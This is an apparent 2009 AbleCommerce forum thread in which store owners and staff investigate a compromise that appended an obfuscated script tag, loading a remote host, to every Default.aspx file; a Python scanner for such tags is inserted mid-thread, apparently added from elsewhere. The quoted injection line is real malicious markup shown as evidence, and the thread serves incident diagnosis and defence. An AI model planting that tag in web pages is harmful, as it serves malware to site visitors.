Parse Error - URGENT - Please help

For general questions and discussions specific to the AbleCommerce 7.0 Asp.Net product.
nfortune
Lieutenant, Jr. Grade (LT JG)
Posts: 27
Joined: Tue Sep 18, 2007 11:34 pm

Parse Error - URGENT - Please help

Post by nfortune » Wed Mar 04, 2009 11:06 am

Hello all,

All of a sudden this morning, we are getting the following errors from our homepage. We did not make any customizations these past couple of days.

It only happens for Default.aspx. If I go directly to a product detail page, the page loads fine.

Which file(s) should I look at to fix the error?


Server Error in '/' Application.
--------------------------------------------------------------------------------

Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Source Error:

Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

Source File: /Admin/Default.aspx Line: 67


Many Thanks!

mazhar
Master Yoda
Posts: 5084
Joined: Wed Jul 09, 2008 8:21 am

Re: Parse Error - URGENT - Please help

Post by mazhar » Wed Mar 04, 2009 11:10 am

Did you inject some javascript in some scriptlet or page? Could you post your store URL?

sohaib
Developer
Posts: 1079
Joined: Fri Jan 23, 2004 1:38 am

Re: Parse Error - URGENT - Please help

Post by sohaib » Wed Mar 04, 2009 11:12 am

Can you please post the full source of your Default.aspx file?

nfortune
Lieutenant, Jr. Grade (LT JG)
Posts: 27
Joined: Tue Sep 18, 2007 11:34 pm

Re: Parse Error - URGENT - Please help

Post by nfortune » Wed Mar 04, 2009 11:14 am

Sohaib,

Here you go, the full source of Default.aspx:

<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>

mazhar
Master Yoda
Posts: 5084
Joined: Wed Jul 09, 2008 8:21 am

Re: Parse Error - URGENT - Please help

Post by mazhar » Wed Mar 04, 2009 11:17 am

Do you have any piece of javascript in the scriptlets that are used on the default page, or maybe you have some conlib control that is trying to inject javascript?

nfortune
Lieutenant, Jr. Grade (LT JG)
Posts: 27
Joined: Tue Sep 18, 2007 11:34 pm

Re: Parse Error - URGENT - Please help

Post by nfortune » Wed Mar 04, 2009 11:23 am

mazhar,

There might be javascript here and there, but we haven't been making any changes to the code these past couple of days. I would assume that it is OK for now.

It seems like all the "Default.aspx" pages throughout the site are giving us this error. What files do all the "Default.aspx" pages share in AbleCommerce?

Thanks!

sohaib
Developer
Posts: 1079
Joined: Fri Jan 23, 2004 1:38 am

Re: Parse Error - URGENT - Please help

Post by sohaib » Wed Mar 04, 2009 11:32 am

nfortune wrote:
Sohaib,

Here you go, the full source of Default.aspx:

<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>

And what is the exact error that you get on this particular page? I suppose this is the source of your home page.

nfortune
Lieutenant, Jr. Grade (LT JG)
Posts: 27
Joined: Tue Sep 18, 2007 11:34 pm

Re: Parse Error - URGENT - Please help

Post by nfortune » Wed Mar 04, 2009 11:43 am

It appears that our server has been hacked! All the Default.aspx files were injected with the offending javascript code!

nickc
Captain (CAPT)
Posts: 276
Joined: Thu Nov 29, 2007 3:48 pm

Re: Parse Error - URGENT - Please help

Post by nickc » Wed Mar 04, 2009 11:46 am

I'd agree, given that the javascript call is to "lndex.net" and resolves to an IP in Beijing...

calvis
Rear Admiral (RADM)
Posts: 710
Joined: Tue Jan 27, 2004 3:57 pm
Location: Redmond, WA

Re: Parse Error - URGENT - Please help

Post by calvis » Wed Mar 04, 2009 12:21 pm

This is scary.
Able Customer Since 1999 Currently Running on GOLD R12 SR1 and PCI Certified.

AbleMods
Master Yoda
Posts: 5170
Joined: Wed Sep 26, 2007 5:47 am
Location: Fort Myers, Florida USA

Re: Parse Error - URGENT - Please help

Post by AbleMods » Wed Mar 04, 2009 1:46 pm

I just got a call from an AC7 customer with the exact same symptoms :shock:
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com

nfortune
Lieutenant, Jr. Grade (LT JG)
Posts: 27
Joined: Tue Sep 18, 2007 11:34 pm

Re: Parse Error - URGENT - Please help

Post by nfortune » Wed Mar 04, 2009 1:53 pm

Joe,

Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.

Thanks!

AbleMods
Master Yoda
Posts: 5170
Joined: Wed Sep 26, 2007 5:47 am
Location: Fort Myers, Florida USA

Re: Parse Error - URGENT - Please help

Post by AbleMods » Wed Mar 04, 2009 2:02 pm

nfortune wrote:
SolunarServices,

Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.

Thanks!

AC7 Final Build 10125 using DiscountASP.Net as the hosting provider.
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com

Katie
AbleCommerce Admin
Posts: 2651
Joined: Tue Dec 02, 2003 1:54 am

Re: Parse Error - URGENT - Please help

Post by Katie » Wed Mar 04, 2009 4:26 pm

Last November, we released an "Important Security Update" as part of Service Release 2. It includes changes that should prevent any SQL injection attacks.

http://help.ablecommerce.com/upgrades/A ... ce_7.0.htm

Since then, we have also released SR3, which includes everything from SR1 and up.

http://help.ablecommerce.com/upgrades/a ... ease_3.htm

It's really important to keep your installs current...
Thank you for choosing AbleCommerce!

http://help.ablecommerce.com - product support
http://wiki.ablecommerce.com - developer support

throttlenet
Ensign (ENS)
Posts: 6
Joined: Thu Jun 12, 2008 4:07 pm

Re: Parse Error - URGENT - Please help

Post by throttlenet » Fri Mar 13, 2009 10:47 am

We have just experienced this same error and are restoring our site from backup. We have reviewed the database to confirm but this is not a SQL Injection attack. This is a file attack and the SQL has not been compromised.

This vulnerability was able to loop through every folder and subfolder in our store. It added the already mentioned script tag to every single .aspx page and completely replaced the text in all html pages.

We are restoring from backup currently and working to ensure all latest service releases are applied. We will post further if we continue to experience issues.
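As an added defender-side example (not code from this thread or from AbleCommerce), here is a scanner that walks a web root for .aspx files carrying a script tag appended after the closing </asp:Content>, the exact shape shown in the error above, and percent-decodes the src so an obfuscated host such as %6C%6E%64%65%78%2E%6E%65%74 is reported in readable form. The sample page is constructed for the example.

```python
import os
import re
from urllib.parse import unquote, urlsplit

# A <script src=...> tag sitting directly after the closing </asp:Content>.
# Anything outside a Content control is illegal on a content page, which is
# why ASP.NET raised the parser error quoted in the thread.
TRAILING_SCRIPT = re.compile(
    r"</asp:Content>\s*(<script\b[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)[^>]*>\s*</script>)",
    re.IGNORECASE,
)


def find_injected_scripts(aspx_source: str):
    """Return (tag, decoded_host) for every script tag that follows </asp:Content>."""
    hits = []
    for m in TRAILING_SCRIPT.finditer(aspx_source):
        tag, src = m.group(1), m.group(2)
        # Percent-decode the src so %6C%6E%64%65%78... shows up as its real hostname.
        host = urlsplit(unquote(src)).hostname or ""
        hits.append((tag, host))
    return hits


def scan_tree(root: str):
    """Walk a web root and map each .aspx path to the trailing script tags found in it."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injected_scripts(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed sample mirroring the error page quoted in the first post.
SAMPLE_PAGE = (
    '<asp:Content runat="server" ContentPlaceHolderID="PageContent">\n'
    "<table><tr><td>home</td></tr>\n</table>\n"
    "</asp:Content><script language=javascript "
    "src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>"
)

if __name__ == "__main__":
    for tag, host in find_injected_scripts(SAMPLE_PAGE):
        print(f"injected script loading from {host}: {tag}")
```

Run scan_tree() against a copy of the web root to get a per-file list before restoring from backup, so you know which files were touched and which host the injected tag points at.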

AbleMods
Master Yoda
Posts: 5170
Joined: Wed Sep 26, 2007 5:47 am
Location: Fort Myers, Florida USA

Re: Parse Error - URGENT - Please help

Post by AbleMods » Fri Mar 13, 2009 1:21 pm

FTP password was probably compromised.
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com

throttlenet
Ensign (ENS)
Posts: 6
Joined: Thu Jun 12, 2008 4:07 pm

Re: Parse Error - URGENT - Please help

Post by throttlenet » Mon Mar 23, 2009 9:14 am

SolunarServices wrote:
FTP password was probably compromised.

We were compromised again almost like clockwork, exactly one week later from my original post. We changed our FTP username and password, applied all security updates and we still were compromised.

Doing some research leads us to the conclusion that somehow the attacker is using the store API to re-write files that are not meant to be re-written.

Without being able to see the details of the Scriptlet and ScriptletType objects, I am guessing they are using something like the EditScriptlet.aspx module to do this. Viewing the source shows that parameters are sent through the querystring to modify content.

i.e. EditScriptlet.aspx?s=Category+Grid+Page+with+Basket+Options&t=Content


With this information exposed in this manner, it is conceivable a session could be hijacked and that the attacker could be using this functionality to do some malicious things.

One other thing that points to a bug in AbleCommerce is that we run our own hosting servers servicing hundreds of customers. This is the only site that was compromised and one of the (if not the) only sites that has file re-writing features. I would think that if the attacker could get down to the level to write files through IIS or FTP, they would have targeted more than one specific site.

I think this is a security issue in the code that needs to be patched immediately. I am anticipating getting hacked again this Friday.

Please understand, I am not trying to point fingers, I just want to be part of the solution. I think there is a major issue here and want to provide confidence to my customers.

Thank you.

nickc
Captain (CAPT)
Posts: 276
Joined: Thu Nov 29, 2007 3:48 pm

Re: Parse Error - URGENT - Please help

Post by nickc » Mon Mar 23, 2009 9:29 am

An attack of that nature would show up in weblogs. Any clues there?
Looking for the IP source is a good place to start. Here's the netblock info for the injected script target:

lndex.net. A 219.152.120.182 

inetnum:      219.151.128.0 - 219.153.255.255
netname:      CHINANET-CQ
descr:        CHINANET Chongqing  province network
descr:        China Telecom
descr:        A12,Xin-Jie-Kou-Wai Street
descr:        Beijing 100088

Logan Rhodehamel
Developer
Posts: 4116
Joined: Wed Dec 10, 2003 5:26 pm

Re: Parse Error - URGENT - Please help

Post by Logan Rhodehamel » Mon Mar 23, 2009 10:04 am

nickc wrote:
An attack of that nature would show up in weblogs. Any clues there?
Looking for the IP source is a good place to start. Here's the netblock info for the injected script target:

Any information from the weblog that can help identify the source of compromise would be immensely helpful. Could you send me the weblog from the day of the compromise? If we can confirm this issue and discover the source, producing a patch would be an immediate priority.
Cheers,
Logan
Image.com

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.

Logan Rhodehamel
Developer
Posts: 4116
Joined: Wed Dec 10, 2003 5:26 pm

Re: Parse Error - URGENT - Please help

Post by Logan Rhodehamel » Mon Mar 23, 2009 10:19 am

nfortune wrote:
Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

Based on this I do not think it has to do with the scriptlet editor. From this snippet, it appears the script tag has been injected into the default.aspx file somehow.

In addition to weblogs, it would be helpful for us to have a copy of the compromised site files. That way I could locate where the injection is physically being placed. As much detail as I can possibly get will help me to track the issue. As of right now, I can't say for certain whether it is specific to AbleCommerce or not.

Anyone with this situation occurring may contact me via PM.
Cheers,
Logan
Image.com

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.

throttlenet
Ensign (ENS)
Posts: 6
Joined: Thu Jun 12, 2008 4:07 pm

Re: Parse Error - URGENT - Please help

Post by throttlenet » Mon Mar 23, 2009 11:12 am

We are reviewing our web logs to see if we can dig out some information and will send it as soon as we can find relevant information.

In our situation we host multiple sites and domains and this is the only compromise we have had. This particular store is very highly ranked in Google and my guess is the URL was found with a BotNet and identified for attack. There is an exploit out right now that is doing this which is occurring for others as well. There is a recent article on Experts Exchange detailing this as well but I am not sure the article has really posted an answer. This attack inserting Lndex.net appears fairly new and we are continuing to search for more information on how the exploit occurs.

throttlenet
Ensign (ENS)
Posts: 6
Joined: Thu Jun 12, 2008 4:07 pm

Re: Parse Error - URGENT - Please help

Post by throttlenet » Mon Mar 23, 2009 12:41 pm

New finding: the URL in the script this time around translates to 51ofnet.net instead of lndex.net. Don't know if this helps, but it was different.

Thanks

Logan Rhodehamel
Developer
Posts: 4116
Joined: Wed Dec 10, 2003 5:26 pm

Re: Parse Error - URGENT - Please help

Post by Logan Rhodehamel » Mon Mar 23, 2009 1:40 pm

I have removed some posts in this thread that were sensitive. The root cause is still being investigated.
Cheers,
Logan
Image.com

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
